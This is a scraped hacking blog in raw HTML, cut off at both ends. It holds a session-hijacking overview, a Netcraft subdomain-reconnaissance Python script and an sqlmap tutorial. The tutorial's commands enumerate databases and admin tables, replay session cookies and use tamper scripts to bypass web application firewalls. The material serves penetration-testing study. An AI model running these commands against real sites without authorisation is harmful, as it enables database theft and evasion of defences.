#000fff;">mail</a></span3052978>, Hotmail,twitter etc. Session hijacking is support on</span></span></span><span style="background-color: transparent; font-size: 14px; line-height: 22px; text-align: left;"><span style="font-family: "arial" , "helvetica" , sans-serif;"> cookies...</span></span></div>
<br style="font-family: Verdana, sans-serif; font-size: 14px; line-height: 14px; margin: 0px; padding: 0px;" />
<span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 0px;">Session hijacking can be done at 2 levels:</span><br />
<br style="font-family: Verdana, sans-serif; font-size: 14px; line-height: 14px; margin: 0px; padding: 0px;" />
<ol style="font-family: Verdana, sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 10px 0px;">
<li style="margin: 0px 0px 0px 35px; padding: 0px; position: relative;"><span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; margin: 0px; padding: 0px;">Network level (TCP and UDP session hijacking)</span></li>
<li style="margin: 0px 0px 0px 35px; padding: 0px; position: relative;"><span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; margin: 0px; padding: 0px;">Application level (<span3052978><a href="http://www.blogger.com/blogger.g?blogID=5858162330672279498" id="Y3052978S9" style="color: #000fff;">HTTP</a></span3052978> session hijacking)</span></li>
</ol>
<br style="font-family: Verdana, sans-serif; font-size: 14px; line-height: 14px; margin: 0px; padding: 0px;" />
<span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 0px;"><br style="line-height: 14px; margin: 0px; padding: 0px;" /></span>
<div class="separator" style="clear: both; font-family: Verdana, sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDJx09u9SwVsRG_T34nCwL8knA9LcXZrf0npls7DGDmSzIifCZOlg09gbwRG5tRiWfXRnyt4SQIl_ncu7VSSrVvdK9WD01brDBk0aZ25cioblQoMOaqE1JeQrzMm-PbsLv6M928DNfi-sy/s1600/kssl.png" imageanchor="1" style="color: #0000dd; margin: 0px 1em; padding: 0px; text-decoration: none;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDJx09u9SwVsRG_T34nCwL8knA9LcXZrf0npls7DGDmSzIifCZOlg09gbwRG5tRiWfXRnyt4SQIl_ncu7VSSrVvdK9WD01brDBk0aZ25cioblQoMOaqE1JeQrzMm-PbsLv6M928DNfi-sy/s320/kssl.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 20px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 0px; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 20px; margin: 0px; padding: 0px; position: relative;" width="320" /></a></div>
<span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 0px;"><b style="margin: 0px; padding: 0px;">Network level (TCP and UDP session hijacking)</b></span><br />
<span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 0px;"><br style="line-height: 14px; margin: 0px; padding: 0px;" /></span><b style="font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 0px;"> TCP session hijacking</b><br />
<span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 0px;">TCP session hijacking is when a hacker takes over a TCP session between two <span3052978><a href="http://www.blogger.com/blogger.g?blogID=5858162330672279498" id="Y3052978S5" style="color: #000fff;">machines</a></span3052978>. Since most authentication only occurs at the start of a TCP session, this allows the hacker to gain access to a machine. It can be done by following <span3052978><a href="http://www.blogger.com/blogger.g?blogID=5858162330672279498" id="Y3052978S7" style="color: #000fff;">ways</a></span3052978>.</span><br />
<br style="font-family: Verdana, sans-serif; font-size: 14px; line-height: 14px; margin: 0px; padding: 0px;" />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: 14px; line-height: 22px;">IP Spoofing: Assuming the identity</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: 14px; line-height: 22px;">Man in the Middle attack using Packet Sniffers</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: 14px; line-height: 22px;">Blind attacks which involves bruteforcing of session id.</span><br />
<br style="font-family: Verdana, sans-serif; font-size: 14px; line-height: 14px; margin: 0px; padding: 0px;" />
<span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 0px;"><br style="line-height: 14px; margin: 0px; padding: 0px;" /></span><span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 0px;"><b style="margin: 0px; padding: 0px;"> UDP session hijacking</b></span><br />
<span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 0px;">It is similar to TCP session hijacking but easier than that because UDP does not use packet sequencing and synchronizing.</span><br />
<span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 0px;"><br style="line-height: 14px; margin: 0px; padding: 0px;" /></span><span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 0px;"><b style="margin: 0px; padding: 0px;">Hijacking Application Levels</b></span><br />
<span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 0px;">In HTTP session hijacking hacker tries to get access to the session ID used in the session to identify the user. HTTP is state less so it need session ID with each request. If hacker get the session id, he can hijack the victim's session.</span><br />
<br style="font-family: Verdana, sans-serif; font-size: 14px; line-height: 14px; margin: 0px; padding: 0px;" />
<ol style="font-family: Verdana, sans-serif; font-size: 14px; line-height: 22px; margin: 0px; padding: 10px 0px;">
<li style="margin: 0px 0px 0px 35px; padding: 0px; position: relative;"><span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; margin: 0px; padding: 0px;">XSS</span></li>
<li style="margin: 0px 0px 0px 35px; padding: 0px; position: relative;"><span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; margin: 0px; padding: 0px;">Man in the middle attack</span></li>
<li style="margin: 0px 0px 0px 35px; padding: 0px; position: relative;"><span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; margin: 0px; padding: 0px;">Bruteforcing session id</span></li>
<li style="margin: 0px 0px 0px 35px; padding: 0px; position: relative;"><span class="Apple-style-span" style="font-family: "arial" , "helvetica" , sans-serif; margin: 0px; padding: 0px;">Man in the browser attack</span></li>
</ol>
</div>
</div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-54868053349890512782014-04-26T09:13:00.000-04:002021-01-28T15:06:20.296-05:00Netcraft Dns Search Engine<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: center;">
<span style="color: cyan; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">
DNS Results From Netcraft Search Engine</span></div>
<div style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;"><br /></span></div>
<div class="date" style="background-color: transparent; border: 0px; color: #444444; font-family: Arial, 'Trebuchet MS', sans-serif; font-size: 13px; height: 80px; left: -123px; line-height: 18px; margin: 0px; padding: 0px; position: absolute; text-align: center; top: -7px; vertical-align: baseline; width: 75px;">
</div>
<div class="entry" style="background-color: transparent; border: 0px; margin: 0px; overflow: hidden; padding: 0px; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; line-height: 20px; margin-bottom: 20px; padding: 0px; text-align: left; vertical-align: baseline;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">The following python script is dedicated for CHC Members and it can obtain DNS results from netcraft search engine.This can be used in the information gathering stage of a penetration test.You can find the source code and a screenshot of the usage of this script below:</span></div>
<div style="background-color: transparent; border: 0px; line-height: 20px; margin-bottom: 20px; padding: 0px; text-align: left; vertical-align: baseline;">
<code style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Monaco, Consolas, 'Andale Mono', 'DejaVu Sans Mono', monospace; font-size: 10px; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="color: #f1c232; font-family: Verdana, sans-serif;"><br /></span></code>
<code style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Monaco, Consolas, 'Andale Mono', 'DejaVu Sans Mono', monospace; font-size: 10px; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="color: #f1c232; font-family: Verdana, sans-serif;">#!/usr/bin/python</span></code></div>
<div style="text-align: left;">
<div style="line-height: 18px;">
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="line-height: 20px;">import httplib</span></span></div>
<br />
<div style="text-align: left;">
</div>
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="line-height: 20px;">import re</span></span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="line-height: 20px;">import sys</span></span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="line-height: 20px;">import string</span></span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="line-height: 20px;">def help():</span></span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="line-height: 20px;">print "[netcraftdns v1.0] - by neuro [0x0lab.org]"</span></span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="line-height: 20px;">print "\nUsage: python netcraftdns.py <domain_name> \n"</span></span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="line-height: 20px;">sys.exit()</span></span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="line-height: 20px;">if len(sys.argv) < 1 or len(sys.argv) > 2:</span></span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="line-height: 20px;">help()</span></span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="line-height: 20px;">elif len(sys.argv) == 2:</span></span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="line-height: 20px;">domain_name = sys.argv[1]</span></span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="line-height: 20px;">else:</span></span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="line-height: 20px;">help()</span></span><br />
<br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; line-height: 18px;">netcraftres=[]<br />totalnum=[]<br />def count(domain_name):<br />global nres<br />rg = httplib.HTTP('searchdns.netcraft.com')<br />rg.putrequest('GET', "/?restriction=site+ends+with&host=" + domain_name)<br />rg.putheader('Host', 'searchdns.netcraft.com')<br />rg.putheader('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')<br />rg.endheaders()<br />errcode, errmsg, headers = rg.getreply()<br />if errcode!=200:<br />print 'Error Sending Request', errcode, errmsg<br />else:<br />rgdata = rg.getfile().read()<br />searchres_pattern='Found [0-9]*'<br />sp = re.compile(searchres_pattern, re.I)<br />res=sp.findall(rgdata)<br />for total in res:<br />resclean=re.sub('Found ', '', total)<br />nres=resclean<br />print "[+]-Total Netcraft Results:", nres<br />def results(domain_name):<br />y=21<br />i=1<br />rg = httplib.HTTP('searchdns.netcraft.com')<br />rg.putrequest('GET', "/?restriction=site+ends+with&host=" + domain_name)<br />rg.putheader('Host', 'searchdns.netcraft.com')<br />rg.putheader('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')<br />rg.endheaders()<br />errcode, errmsg, headers = rg.getreply()<br />if errcode!=200:<br />print 'Error Sending Request', errcode, errmsg<br />else:<br />rgdata = rg.getfile().read()<br />pattern='[\w\.\-]+.'+domain_name<br />rgr = re.compile(pattern, re.I)<br />rgresults = rgr.findall(rgdata)<br />for netres in rgresults:<br />if netcraftres.count(netres) == 0:<br />netcraftres.append(netres)<br />print " |-", str(netres)<br />i=i+1<br />while y<nres:<br />if nres=="0":<br />break<br />rgi = httplib.HTTP('searchdns.netcraft.com')<br />rgi.putrequest('GET', "/?host=*."+domain_name+"&last="+netcraftres[-1]+"&from="+str(y)+"&restriction=site%20contains&position=")<br />rgi.putheader('Host', 'searchdns.netcraft.com')<br />rgi.putheader('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')<br />rgi.endheaders()<br />errcode, errmsg, headers = rgi.getreply()<br />if errcode!=200:<br />print 'Error Sending Request', errcode, errmsg<br />else:<br />rgdata1 = rgi.getfile().read()<br />pattern2='[\w\.\-]+.'+domain_name<br />rgr1 = re.compile(pattern2, re.I)<br />rgresults1 = rgr.findall(rgdata1)<br />if y > int(nres):<br />break<br />else:<br />y = y + 20<br />for netres1 in rgresults1:<br />if netcraftres.count(netres1) == 0:<br />netcraftres.append(netres1)<br />print " |-", str(netres1)</span><br />
<span style="color: lime; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; line-height: 18px;">i=i+1</span><br />
<span style="color: lime; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 18px;">count(domain_name)</span><br />
<span style="color: lime; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 18px;">results(domain_name)</span><br />
<span style="color: lime; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 18px;"><br /></span>
<a href="http://pentestlab.files.wordpress.com/2013/01/netcraftdns.jpeg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; color: #cd4517; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="netcraftdns - Sample Results" class="size-full wp-image-1603" src="http://pentestlab.files.wordpress.com/2013/01/netcraftdns.jpeg?w=645" style="background-color: white; background-position: initial initial; background-repeat: initial initial; border: 0px; height: auto; margin: 0px auto; max-width: 621px; padding: 2px; vertical-align: baseline;" /></a><br />
<span style="color: #f9cb9c; font-family: Arial, 'Trebuchet MS', sans-serif; line-height: 20px;">netcraftdns – Sample Results</span></div>
</div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-1292901506456717992014-04-05T23:11:00.002-04:002014-04-06T00:05:36.856-04:00Advance Sqlmap Commands<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="background-color: transparent; margin: 0px; position: relative; text-align: left;">
<br />
<div style="text-align: center;">
<span style="color: #f6b26b; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">Advance Sqlmap tutorial</span></div>
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span></span><br />
<div style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgueKOqVEH-9FtJKk28LOLxrqS_x_pMf94zJUINyBFa5nN8QJKoYe8O0WfY1bSnAl3kAszw-S8d0oc4ahqhKQXSj8oWuoY6dIoGZwDU_RKn0k4AJbDfxAxt6LWLrKmw8kkk80NUYKpu3Us/s320/sqlmap.png" /></div>
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span></span>
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">1.... When you have the target URL but you are not sure if any of the parameter in that request is vulnerable </span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">then sqlmap can act as scanner in that case. </span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">The syntax for the GET request is as follow </span></span><span style="font-weight: normal;"><span style="color: lime;">./sqlmap.py -u "http://www.site.com/oldman.php?id=5&text=dummy"</span><span style="color: #f3f3f3;"> </span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">The syntax for the POST request is as follow</span></span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-weight: normal;"><span style="color: lime;">./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy"</span><span style="color: #f3f3f3;"> </span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">This will tell you whether any of the variable viz. id, text is vulnerable to sql injection or not.</span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">Note: Through out this tutorial we will take POST request as an example. The only difference in the </span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">syntax of GET and POST request is that POST request has an additional switch (--data) which has your post parameters and their values.</span></span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">2.... When you doubt that a particular parameter might be vulnerable to sql injection then you can specify that parameter with -p switch. The syntax is as follows</span></span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-weight: normal;"><span style="color: lime;">./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id"</span><span style="color: #f3f3f3;"> </span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">sqlmap will try to check if parameter "id" is injectable or not.</span></span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">3.... If the instance described in the last scenarios (i.e. 1, 2) is only available after user authenticates </span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">with the application then the steps would be as follows,</span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">a) Login into your application.</span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">b) Note down all the cookie names and its values. Let us assume that the cookies generated are cookie1=dummy_val1, cookie2=dummy_val2.</span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">c) Use sqlmap --cookie switch to replay these cookies along with the sqlmap requests.</span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">So the syntax will be as follows</span></span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: lime; font-weight: normal;">./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --cookie="cookie1=dummy_val1;cookie2=dummy_val2"</span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">4.... To get the value of the backend database such as version name, current database name and database user, the syntax will be</span></span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: lime; font-weight: normal;">./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --current-db --current-user</span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span><span style="font-weight: normal;"><span style="color: #f3f3f3;">5.... To get the tables of dummydb database , the syntax will be</span><span style="color: lime;"> </span></span><span style="color: lime; font-weight: normal;">./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --tables -D "dummydb"</span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">6.... To get the columns of admin table, the syntax will be </span></span><span style="color: lime; font-weight: normal;">./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --columns -T "admin"</span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">7.... When you know the backend database provider such as mssql, mysql, oracle, etc. then you can specify it with the --dbms switch. </span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">This will tell sqlmap to not to try queries related to other databases and in turn can speed up the injection process.</span></span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: lime; font-weight: normal;">./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --dbms="oracle"</span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">8.... If the application is protected by web application firewall (w.a.f) then you can try various tamper scripts to bypass w.a.f detection. </span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">There are almost 30 such tamper scripts available. To specify one such tamper scripts, you can use --tamper switch. The syntax is </span></span><span style="color: lime; font-weight: normal;">./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --tamper="tamper_script1_name.py,tamper_script2_name.py" </span><span style="color: #f3f3f3;"><span style="font-weight: normal;">All the available tamper scripts can be found under the tamper directory inside sqlmap root directory.</span></span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">9.... Writing your own Tamper script.</span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">There are certain cases when application has very weak detection signature but none of the tamper script can do the job. </span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">For example, if the application code detects "UNION SELECT" but not "UNION SELEcT" then sqlmap will not be able to inject</span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">that target as all the payloads of sqlmap will be like "UNION ALL SELECT", "WAITFOR DELAY", etc.</span></span><span style="color: #f3f3f3;"><span style="font-weight: normal;">So let us create our own tamper script. The format of any tamper script will be as follow</span></span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span></span>
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><span style="font-weight: normal;"><br /></span></span></span>
<span style="color: #880000; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;"># Needed imports</span><br />
<span style="color: #333333; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;"><span class="kwd" style="color: #000088;">from</span><span class="pln" style="color: black;"> </span></span><span class="pln" style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;">lib</span><span class="pun" style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;">.</span><span class="pln" style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;">core</span><span class="pun" style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;">.</span><span class="pln" style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;">enums </span><span style="color: #333333; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;"><span class="pln" style="color: black;"> </span><span class="kwd" style="color: #000088;">import</span><span class="pln" style="color: black;"> </span></span><span class="pln" style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;">PRIORIT</span><span class="pln" style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;">Y</span><br />
<div style="font-family: monospace; line-height: 18.200000762939453px; white-space: pre;">
<span style="font-family: Verdana, sans-serif;"><span class="com" style="color: #880000;">#Define which is the order of application of tamper scripts against the </span></span><span style="color: #880000; font-family: Verdana, sans-serif;">payload</span></div>
<span class="pln" style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;"><br /></span>
<span class="pln" style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;">__priority__ </span><span class="pun" style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;">=</span><span class="pln" style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;"> PRIORITY</span><span class="pun" style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;">.</span><span class="pln" style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;">NORMAL</span><span class="pln" style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18.200000762939453px; white-space: pre;"></span><br />
<div style="font-family: monospace; line-height: 18.200000762939453px; white-space: pre;">
<span style="color: #333333; font-family: Verdana, sans-serif;"><span class="kwd" style="color: #000088;">def</span><span class="pln" style="color: black;"> </span></span><span class="pln" style="color: #f3f3f3; font-family: Verdana, sans-serif;">tamper</span><span class="pun" style="color: #f3f3f3; font-family: Verdana, sans-serif;">(</span><span class="pln" style="color: #f3f3f3; font-family: Verdana, sans-serif;">payload</span><span class="pun" style="color: #f3f3f3; font-family: Verdana, sans-serif;">):</span></div>
<div style="font-family: monospace; line-height: 18.200000762939453px; white-space: pre;">
<span class="pun" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><span style="color: #008800;">'''
Description of your tamper script</span></span></div>
<div style="font-family: monospace; line-height: 18.200000762939453px; white-space: pre;">
<span class="str" style="color: #008800; font-family: Verdana, sans-serif;">'''</span><span class="str" style="color: #008800; font-family: Verdana, sans-serif;"> Description of your tamper script</span><span class="str" style="color: #008800; font-family: Verdana, sans-serif;"> '''</span><span class="str" style="color: #008800; font-family: Verdana, sans-serif;"> Description of your tamper script</span><span class="str" style="color: #008800; font-family: Verdana, sans-serif;"> '''</span></div>
<div style="font-family: monospace; line-height: 18.200000762939453px; white-space: pre;">
<span class="str" style="color: #008800; font-family: Verdana, sans-serif;"><span class="pln" style="color: #f3f3f3;">retVal </span><span class="pun" style="color: #f3f3f3;">=</span><span class="pln" style="color: #f3f3f3;"> payload</span></span></div>
<div style="color: #333333; font-family: monospace; line-height: 18.200000762939453px; white-space: pre;">
<span style="font-family: Verdana, sans-serif;"><span class="com" style="color: #880000;"># your code to tamper the original payload</span><span class="pln" style="color: black;"> </span><span class="com" style="color: #880000;"># return the tampered payload</span><span class="pln" style="color: black;"> </span></span></div>
<div style="font-family: monospace; line-height: 18.200000762939453px; white-space: pre;">
<span class="str" style="color: #008800; font-family: Verdana, sans-serif;"><span class="pln" style="color: #f3f3f3;"></span></span></div>
<div style="color: #333333; font-family: monospace; line-height: 18.200000762939453px; white-space: pre;">
<span style="font-family: Verdana, sans-serif;"><span class="kwd" style="color: #000088;">return</span></span><span class="pln" style="color: black;"><span style="font-family: Verdana, sans-serif;"> </span></span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">retVal</span></div>
<div style="color: #333333; font-family: monospace; line-height: 18.200000762939453px; white-space: pre;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div style="color: #333333; font-family: monospace; line-height: 18.200000762939453px; white-space: pre;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div style="color: #333333; font-family: monospace; line-height: 18.200000762939453px; white-space: pre;">
<br /></div>
</div>
<div class="post-body entry-content" id="post-body-4950104806992861083" itemprop="description articleBody" style="background-color: transparent; line-height: 18.200000762939453px; position: relative; width: 1016px;">
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><br /></span></span>
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;">Based on the above tamper script format, our script will be</span></span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><br /></span></span>
<span style="font-family: Verdana, sans-serif;"><span class="com" style="color: #880000;">#!/usr/bin/env python</span><span class="pln" style="color: black;"> </span></span><br />
<span style="font-family: Verdana, sans-serif;"><span class="str" style="color: #008800;">"""</span></span><br />
<span style="font-family: Verdana, sans-serif;"><span class="str" style="color: #008800;">Sample script by oldmanlab</span></span><span class="str" style="color: #008800; font-family: Verdana, sans-serif;">.</span><br />
<span class="str" style="color: #008800; font-family: Verdana, sans-serif;">Email : oldmanlab@gmail.com</span><br />
<span class="str" style="color: #008800; font-family: Verdana, sans-serif;">"""</span><span class="pln" style="color: black; font-family: Verdana, sans-serif;"> </span><br />
<span style="font-family: Verdana, sans-serif;"><span class="kwd" style="color: #000088;">from</span><span class="pln"> <span style="color: #f3f3f3;">lib</span></span><span style="color: #f3f3f3;"><span class="pun">.</span><span class="pln">core</span><span class="pun">.</span><span class="pln">enums</span></span><span class="pln" style="color: black;"> </span><span class="kwd" style="color: #000088;">import</span><span class="pln"> <span style="color: #f3f3f3;">PRIORITY __priority__</span></span><span class="pln"></span><span style="color: #f3f3f3;"><span class="pln">__priority__ </span><span class="pun">=</span><span class="pln"> PRIORITY</span><span class="pun">.</span></span><span class="pln"><span style="color: #f3f3f3;">NORMAL</span></span><span class="pln" style="color: black;"></span><span class="kwd" style="color: #000088;"><br />def</span><span class="pln"> <span style="color: #f3f3f3;">tamper</span></span><span style="color: #f3f3f3;"><span class="pun">(</span><span class="pln">payload</span></span><span class="pun"><span style="color: #f3f3f3;">):</span></span><span class="pln" style="color: black;"> 